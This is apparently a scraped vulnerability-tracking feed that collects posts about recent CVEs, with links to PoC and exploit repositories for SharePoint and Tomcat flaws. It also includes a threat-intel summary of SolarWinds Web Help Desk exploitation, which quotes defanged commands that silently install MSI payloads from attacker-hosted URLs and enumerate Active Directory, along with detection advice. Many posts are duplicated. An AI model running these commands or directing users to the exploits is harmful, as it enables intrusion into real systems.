https://github.com/Rabbitbong/OurSharePoint-CVE-2025-53770
https://github.com/Agampreet-Singh/CVE-2025-53770
https://github.com/peiqiF4ck/WebFrameworkTools-5.5-enhance
https://github.com/nisargsuthar/suricata-rule-CVE-2025-53770
https://github.com/Cameloo1/sharepoint-toolshell-micro-postmortem
https://github.com/daryllundy/CVE-2025-53770
https://github.com/3a7/CVE-2025-53770
https://github.com/hazcod/CVE-2025-53770
https://github.com/paolokappa/SharePointSecurityMonitor
https://github.com/bitsalv/ToolShell-Honeypot
https://github.com/exfil0/CVE-2025-53770
https://github.com/MuhammadWaseem29/CVE-2025-53770
https://github.com/kaizensecurity/CVE-2025-53770
https://github.com/0x-crypt/CVE-2025-53770-Scanner
https://github.com/0xray5c68616e37/cve-2025-53770
https://github.com/go-bi/sharepoint-CVE-2025-53770
https://github.com/Michaael01/LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell
https://github.com/Udyz/CVE-2025-53770-Exploit
https://github.com/GreenForceNetworks/Toolshell_CVE-2025-53770
https://github.com/unk9vvn/sharepoint-toolpane
https://github.com/bharath-cyber-root/sharepoint-toolshell-cve-2025-53770
https://github.com/saladin0x1/CVE-2025-53770
https://github.com/soltanali0/CVE-2025-53770-Exploit
https://github.com/Immersive-Labs-Sec/SharePoint-CVE-2025-53770-POC
https://github.com/grupooruss/CVE-2025-53770-Checker
https://github.com/Sec-Dan/CVE-2025-53770-Scanner
https://github.com/zach115th/ToolShellFinder
https://github.com/r3xbugbounty/CVE-2025-53770
https://github.com/siag-itsec/CVE-2025-53770-Hunting
https://github.com/imbas007/CVE-2025-53770-Vulnerable-Scanner
What Defined Defense in 2025
Read the full blog WHAT CVE-2025-53770 TEACHES US ABOUT ZERO-DAY REALITY AND RANSOMWARE ROUTINE This blog reframes zero-day exploitation as an...
🔗️ [Binarydefense] https://link.is.it/3GT18k
##What CVE-2025-53770 Teaches Us About Zero-Day Reality and Ransomware…
CVE-2025-53770 is a critical SharePoint RCE flaw. The goals certainly don’t. The Exploit Chain: Familiar Steps, Different Stage At its core,…
🔗️ [Binarydefense] https://link.is.it/EtPFu3
##What Defined Defense in 2025
Read the full blog WHAT CVE-2025-53770 TEACHES US ABOUT ZERO-DAY REALITY AND RANSOMWARE ROUTINE This blog reframes zero-day exploitation as an...
🔗️ [Binarydefense] https://link.is.it/3GT18k
##What CVE-2025-53770 Teaches Us About Zero-Day Reality and Ransomware…
CVE-2025-53770 is a critical SharePoint RCE flaw. The goals certainly don’t. The Exploit Chain: Familiar Steps, Different Stage At its core,…
🔗️ [Binarydefense] https://link.is.it/EtPFu3
##updated 2025-10-22T17:31:15
1 posts
18 repos
https://github.com/ianxtianxt/CVE-2017-12615
https://github.com/wsg00d/cve-2017-12615
https://github.com/wudidwo/CVE-2017-12615-poc
https://github.com/cyberharsh/Tomcat-CVE-2017-12615
https://github.com/tpt11fb/AttackTomcat
https://github.com/Fa1c0n35/CVE-2017-12615
https://github.com/Shellkeys/CVE-2017-12615
https://github.com/xiaokp7/Tomcat_PUT_GUI_EXP
https://github.com/mefulton/cve-2017-12615
https://github.com/w0x68y/CVE-2017-12615-EXP
https://github.com/cved-sources/cve-2017-12615
https://github.com/zi0Black/POC-CVE-2017-12615-or-CVE-2017-12717
https://github.com/netw0rk7/CVE-2017-12615-Home-Lab
https://github.com/edyekomu/CVE-2017-12615-PoC
https://github.com/breaktoprotect/CVE-2017-12615
https://github.com/lizhianyuguangming/TomcatScanPro
Apache Tomcat is far and away the most likely intended target given port 8080 and the Java exception body content. The DefaultServlet with readonly=false in web.xml is the textbook case (CVE-2017-12615, CVE-2017-12617). Eclipse Jetty can also expose similar behavior if its DefaultServlet or WebDAV module is configured to allow PUT writes. Apache TomEE, being Tomcat-based with Jakarta EE extensions, inherits all of the same misconfigurations. (5/15)
##updated 2025-10-22T17:30:39
1 posts
13 repos
https://github.com/DevaDJ/CVE-2017-12617
https://github.com/tyranteye666/tomcat-cve-2017-12617
https://github.com/LongWayHomie/CVE-2017-12617
https://github.com/K3ysTr0K3R/CVE-2017-12617-EXPLOIT
https://github.com/cyberheartmi9/CVE-2017-12617
https://github.com/TheRealCiscoo/Tomcat_CVE201712617
https://github.com/jptr218/tc_hack
https://github.com/devcoinfet/CVE-2017-12617
https://github.com/yZee00/CVE-2017-12617
https://github.com/zi0Black/POC-CVE-2017-12615-or-CVE-2017-12717
https://github.com/qiantu88/CVE-2017-12617
Apache Tomcat is far and away the most likely intended target given port 8080 and the Java exception body content. The DefaultServlet with readonly=false in web.xml is the textbook case (CVE-2017-12615, CVE-2017-12617). Eclipse Jetty can also expose similar behavior if its DefaultServlet or WebDAV module is configured to allow PUT writes. Apache TomEE, being Tomcat-based with Jakarta EE extensions, inherits all of the same misconfigurations. (5/15)
##updated 2025-10-22T00:33:13
1 posts
Here's a summary of recent important global, technology, and cybersecurity news:
**Global:**
US-Iran talks continued, with the US demanding nuclear concessions (Feb 7). Italy thwarted suspected Russian cyberattacks targeting government and Olympic-linked websites (Feb 6).
**Technology:**
Big Tech firms (Amazon, Alphabet, Meta, Microsoft) are committing $650B to AI infrastructure in 2026. OpenAI launched Frontier, an enterprise AI agent platform (Feb 6). Intel and AMD warned China of server CPU shortages, citing AI demand and US export rules (Feb 6).
**Cybersecurity:**
CISA ordered US federal agencies to remove unsupported edge network devices to reduce risk (Feb 6). Ransomware groups are actively exploiting a critical VMware ESXi flaw (CVE-2025-22225) (Feb 6). Global cybersecurity laws are tightening, mandating rapid incident reporting (Feb 7).
updated 2025-09-23T06:30:33
6 posts
1 repos
----------------
🎯 Threat Intelligence
===================
Executive summary: Huntress observed active exploitation of SolarWinds Web Help Desk (WHD) tied to recent untrusted-deserialization vulnerabilities, notably CVE-2025-26399 and CVE-2025-40551. Attackers achieved remote code execution and quickly deployed legitimate remote-management and DFIR tooling to maintain access.
Technical details:
• Initial process chain reported: wrapper.exe (WHD service wrapper) spawned java.exe (Tomcat-based WHD) which launched cmd.exe to silently install MSI payloads.
• Observed staged installers and deployment vectors:
• msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi (Zoho/ManageEngine RMM agent)
• msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/.../v4.msi (Velociraptor MSI)
• Remote access persistence included unattended Zoho Assist/ManageEngine registration tied to Proton Mail account esmahyft@proton[.]me.
• Post-exploitation activity included Active Directory discovery using net group "domain computers" /do, executed from the RMM agent process TOOLSIQ.EXE.
Attack chain analysis:
• Initial Access: Exploitation of WHD deserialization vulnerabilities (CVE-2025-26399, CVE-2025-40551).
• Download: MSI payloads hosted on third-party services (Catbox, Supabase).
• Execution: Silent MSI installation via spawned command process from WHD service chain.
• Persistence & Lateral Movement: Legitimate RMM agent configured for unattended access; AD enumeration to enumerate domain targets.
• C2/Tooling: Velociraptor deployed and configured pointing at attacker-controlled storage/infrastructure.
Detection considerations:
• Monitor for anomalous child processes of wrapper.exe/java.exe and unexpected use of msiexec pulling from unusual domains.
• Look for registrations or sessions associated with Zoho/ManageEngine agents and unusual agent process names like TOOLSIQ.EXE.
• Review AD enumeration activity (net group queries) originating from endpoints hosting WHD or RMM agents.
Limitations & notes:
• Huntress observed exploitation across three customers and reports protection coverage across 84 endpoints in 78 organizations using WHD.
• Public advisories include Microsoft notes and CISA listing for CVE-2025-40551; versions prior to 12.8.7 HF1 are reported as vulnerable.
🔹 solarwinds #CVE-2025-26399 #CVE-2025-40551 #velociraptor #zoho
🔗 Source: https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399
##Huntress researchers Anna Pham, John Hammond & Jamie Levy observed threat actors exploiting a SolarWinds Web Help Desk vulnerability and warn organizations to apply the update from SolarWinds’ website as soon as possible. https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399
##🛡️ CyberHost Malware List Stats 🛡️
3 new domains were added yesterday
Threat Intel Used:
https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399
Blocklist Details: https://cyberhost.uk/malware-blocklist
##Huntress researchers Anna Pham, John Hammond & Jamie Levy observed threat actors exploiting a SolarWinds Web Help Desk vulnerability and warn organizations to apply the update from SolarWinds’ website as soon as possible. https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399
##From yesterday.
Huntress: Active Exploitation of SolarWinds Web Help Desk https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399 @huntress #infosec #SolarWinds #vulnerability #threatresearch
##Hat tip to @JohnHammond @gleeda @russianpanda9xx et al
https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399
##updated 2025-03-12T15:33:04
1 posts
you were literally shown an example of a recent Acrobat Reader bug that potentially could lead to RCE - many other examples are available, like www.cvedetails.com/cve/CVE-2025...; if you want more, Google is right where you left it
CVE-2025-27158 : Acrobat Reade...
🟠 CVE-2026-25506 - High (7.7)
MUNGE is an authentication service for creating and validating user credentials. From 0.5 to 0.5.17, local attacker can exploit a buffer overflow vulnerability in munged (the MUNGE authentication daemon) to leak cryptographic key material from pro...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25506/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25506 - High (7.7)
MUNGE is an authentication service for creating and validating user credentials. From 0.5 to 0.5.17, local attacker can exploit a buffer overflow vulnerability in munged (the MUNGE authentication daemon) to leak cryptographic key material from pro...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25506/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-26009 - Critical (9.9)
Catalyst is a platform built for enterprise game server hosts, game communities, and billing panel integrations. Install scripts defined in server templates execute directly on the host operating system as root via bash -c, with no sandboxing or c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26009/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-26009 - Critical (9.9)
Catalyst is a platform built for enterprise game server hosts, game communities, and billing panel integrations. Install scripts defined in server templates execute directly on the host operating system as root via bash -c, with no sandboxing or c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26009/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##A critical arbitrary file upload vulnerability (CVE-2026-1357, CVSS 9.8) was discovered in the WPvivid Backup & Migration plugin, which is installed on over 800,000 WordPress sites.
The flaw allows unauthenticated attackers to upload arbitrary files, potentially achieving remote code execution and full site takeover.
Update to version 0.9.124. Wordfence Premium users received firewall protection on January 22.
##🟠 CVE-2026-24682 - High (7.5)
FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, audin_server_recv_formats frees an incorrect number of audio formats on parse failure (i + i), leading to out-of-bounds access in audio_formats_free. This vulnerabil...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24682/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-24682 - High (7.5)
FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, audin_server_recv_formats frees an incorrect number of audio formats on parse failure (i + i), leading to out-of-bounds access in audio_formats_free. This vulnerabil...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24682/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##libpng 1.6.55 has been released with fix to CVE-2026-25646:
"CVE-2026-25646 (High): Heap buffer overflow in png_set_quantize when called with no histogram and a palette larger than twice the requested maximum number of colors.
The vulnerability exists in the color quantization code that reduces the number of colors in a palette. A logic error in the color distance table causes current palette indices to be stored where original indices are expected. After palette entries are swapped during color pruning, the index mismatch causes the pruning loop to fail to find valid candidates, the search bound grows past the end of a heap-allocated buffer, and out-of-bounds reads occur.
The images that trigger this vulnerability are valid per the PNG specification. The bug has existed since the initial version of png_set_quantize (then called png_set_dither).
Unlike the recent CVEs fixed in libpng 1.6.51, 1.6.52 and 1.6.54, whichaffected the simplified API, this vulnerability affects the low-level function png_set_quantize.
This can result in denial of service and potentially information disclosure or arbitrary code execution via heap corruption."
Announcement: https://www.openwall.com/lists/oss-security/2026/02/09/7
Advisory: https://github.com/pnggroup/libpng/security/advisories/GHSA-g8hp-mq4h-rqm3
Fix: https://github.com/pnggroup/libpng/commit/01d03b8453eb30ade759cd45c707e5a1c7277d88
libpng 1.6.55 has been released with fix to CVE-2026-25646:
"CVE-2026-25646 (High): Heap buffer overflow in png_set_quantize when called with no histogram and a palette larger than twice the requested maximum number of colors.
The vulnerability exists in the color quantization code that reduces the number of colors in a palette. A logic error in the color distance table causes current palette indices to be stored where original indices are expected. After palette entries are swapped during color pruning, the index mismatch causes the pruning loop to fail to find valid candidates, the search bound grows past the end of a heap-allocated buffer, and out-of-bounds reads occur.
The images that trigger this vulnerability are valid per the PNG specification. The bug has existed since the initial version of png_set_quantize (then called png_set_dither).
Unlike the recent CVEs fixed in libpng 1.6.51, 1.6.52 and 1.6.54, whichaffected the simplified API, this vulnerability affects the low-level function png_set_quantize.
This can result in denial of service and potentially information disclosure or arbitrary code execution via heap corruption."
Announcement: https://www.openwall.com/lists/oss-security/2026/02/09/7
Advisory: https://github.com/pnggroup/libpng/security/advisories/GHSA-g8hp-mq4h-rqm3
Fix: https://github.com/pnggroup/libpng/commit/01d03b8453eb30ade759cd45c707e5a1c7277d88
I've uploaded new versions of the Shaarli package (bookmarks app) in Debian with a security fix.
The package versions with the fix:
- 0.16.1+dfsg-1 in testing and unstable
- 0.14.0+dfsg-2+deb13u1 in stable-security
- 0.12.1+dfsg-8+deb12u2 in oldstable-security
More information about the issue:
https://github.com/shaarli/Shaarli/security/advisories/GHSA-g3xq-mj52-f8pg
https://security-tracker.debian.org/tracker/CVE-2026-24476
I've uploaded new versions of the Shaarli package (bookmarks app) in Debian with a security fix.
The package versions with the fix:
- 0.16.1+dfsg-1 in testing and unstable
- 0.14.0+dfsg-2+deb13u1 in stable-security
- 0.12.1+dfsg-8+deb12u2 in oldstable-security
More information about the issue:
https://github.com/shaarli/Shaarli/security/advisories/GHSA-g3xq-mj52-f8pg
https://security-tracker.debian.org/tracker/CVE-2026-24476
🟠 CVE-2026-25931 - High (7.8)
vscode-spell-checker is a basic spell checker that works well with code and documents. Prior to v4.5.4, DocumentSettings._determineIsTrusted treats the configuration value cSpell.trustedWorkspace as the authoritative trust flag. The value defaults...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25931/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25808 - High (7.5)
Hollo is a federated single-user microblogging software designed to be federated through ActivityPub. Prior to 0.6.20 and 0.7.2, there is a security vulnerability where DMs and followers-only posts were exposed through the ActivityPub outbox endpo...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25808/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25880 - High (7.8)
SumatraPDF is a multi-format reader for Windows. In 3.5.2 and earlier, the PDF reader allows execution of a malicious binary (explorer.exe) located in the same directory as the opened PDF when the user clicks File → “Show in folder”. This be...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25880/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25925 - High (7.8)
PowerDocu contains a Windows GUI executable to perform technical documentations. Prior to 2.4.0, PowerDocu contains a critical security vulnerability in how it parses JSON files within Flow or App packages. The application blindly trusts the $type...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25925/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25231 - High (7.5)
FileRise is a self-hosted web file manager / WebDAV server. Versions prior to 3.3.0, the application contains an unauthenticated file read vulnerability due to the lack of access control on the /uploads directory. Files uploaded to this directory ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25231/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25231 - High (7.5)
FileRise is a self-hosted web file manager / WebDAV server. Versions prior to 3.3.0, the application contains an unauthenticated file read vulnerability due to the lack of access control on the /uploads directory. Files uploaded to this directory ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25231/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-25057 - Critical (9.1)
MarkUs is a web application for the submission and grading of student assignments. Prior to 2.9.1, instructors are able to upload a zip file to create an assignment from an exported configuration (courses//assignments/upload_config_files). The upl...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25057/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Security Advisory: Privilege escalation to the `CAP_NET_RAW` capability via the `programs.captive-browser` NixOS module (CVE-2026-25740)
##🟠 CVE-2026-25644 - High (7.5)
DataHub is an open-source metadata platform. Prior to version 1.3.1.8, the LDAP ingestion source is vulnerable to MITM attack through TLS downgrade. This issue has been patched in version 1.3.1.8.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25644/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25636 - High (8.2)
calibre is an e-book manager. In 9.1.0 and earlier, a path traversal vulnerability in Calibre's EPUB conversion allows a malicious EPUB file to corrupt arbitrary existing files writable by the Calibre process. During conversion, Calibre resolves C...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25636/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25636 - High (8.2)
calibre is an e-book manager. In 9.1.0 and earlier, a path traversal vulnerability in Calibre's EPUB conversion allows a malicious EPUB file to corrupt arbitrary existing files writable by the Calibre process. During conversion, Calibre resolves C...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25636/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25636 - High (8.2)
calibre is an e-book manager. In 9.1.0 and earlier, a path traversal vulnerability in Calibre's EPUB conversion allows a malicious EPUB file to corrupt arbitrary existing files writable by the Calibre process. During conversion, Calibre resolves C...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25636/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25635 - High (8.6)
calibre is an e-book manager. Prior to 9.2.0, Calibre's CHM reader contains a path traversal vulnerability that allows arbitrary file writes anywhere the user has write permissions. On Windows (haven't tested on other OS's), this can lead to Remot...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25635/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25635 - High (8.6)
calibre is an e-book manager. Prior to 9.2.0, Calibre's CHM reader contains a path traversal vulnerability that allows arbitrary file writes anywhere the user has write permissions. On Windows (haven't tested on other OS's), this can lead to Remot...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25635/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25635 - High (8.6)
calibre is an e-book manager. Prior to 9.2.0, Calibre's CHM reader contains a path traversal vulnerability that allows arbitrary file writes anywhere the user has write permissions. On Windows (haven't tested on other OS's), this can lead to Remot...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25635/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25634 - High (7.8)
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to 2.3.1.4, SrcPixel and DestPixel stack buffers overlap in CIccTagMultiProcessElement::Apply() int ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25634/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25634 - High (7.8)
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to 2.3.1.4, SrcPixel and DestPixel stack buffers overlap in CIccTagMultiProcessElement::Apply() int ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25634/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25634 - High (7.8)
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to 2.3.1.4, SrcPixel and DestPixel stack buffers overlap in CIccTagMultiProcessElement::Apply() int ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25634/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25731 - High (7.8)
calibre is an e-book manager. Prior to 9.2.0, a Server-Side Template Injection (SSTI) vulnerability in Calibre's Templite templating engine allows arbitrary code execution when a user converts an ebook using a malicious custom template file via th...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25731/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25731 - High (7.8)
calibre is an e-book manager. Prior to 9.2.0, a Server-Side Template Injection (SSTI) vulnerability in Calibre's Templite templating engine allows arbitrary code execution when a user converts an ebook using a malicious custom template file via th...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25731/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-25643 - Critical (9.1)
Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. Prior to 0.16.4, a critical Remote Command Execution (RCE) vulnerability has been identified in the Frigate integration with go2rtc. The application doe...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25643/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-25643 - Critical (9.1)
Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. Prior to 0.16.4, a critical Remote Command Execution (RCE) vulnerability has been identified in the Frigate integration with go2rtc. The application doe...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25643/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##